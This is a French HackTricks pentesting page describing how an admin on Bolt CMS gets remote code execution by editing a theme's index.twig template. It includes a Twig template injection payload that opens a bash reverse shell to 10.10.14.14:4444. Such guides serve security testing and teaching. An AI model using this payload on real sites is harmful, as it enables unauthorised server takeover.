Bolt CMS

Tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

• Vérifiez les plans d’abonnement !
• Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
• Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.

RCE

Après vous être connecté en tant qu’administrateur (allez à /bot pour accéder à l’invite de connexion), vous pouvez obtenir RCE dans Bolt CMS :

• Sélectionnez Configuration -> View Configuration -> Main Configuration ou allez à l’URL /bolt/file-edit/config?file=/bolt/config.yaml
• Vérifiez la valeur du thème

• Sélectionnez File management -> View & edit templates
• Sélectionnez la base de thème trouvée dans l’étape précédente (base-2021 dans ce cas) et sélectionnez index.twig
• Dans mon cas, cela se trouve à l’URL /bolt/file-edit/themes?file=/base-2021/index.twig
• Mettez votre payload dans ce fichier via template injection (Twig), comme : {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
• Et enregistrez les modifications

• Videz le cache dans Maintenance -> Clear the cache
• Accédez à nouveau à la page en tant qu’utilisateur régulier, et le payload devrait être exécuté

Tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE) Apprenez et pratiquez le hacking Azure : HackTricks Training Azure Red Team Expert (AzRTE)

Soutenir HackTricks

• Vérifiez les plans d’abonnement !
• Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
• Partagez des astuces de hacking en soumettant des PR au HackTricks et HackTricks Cloud dépôts github.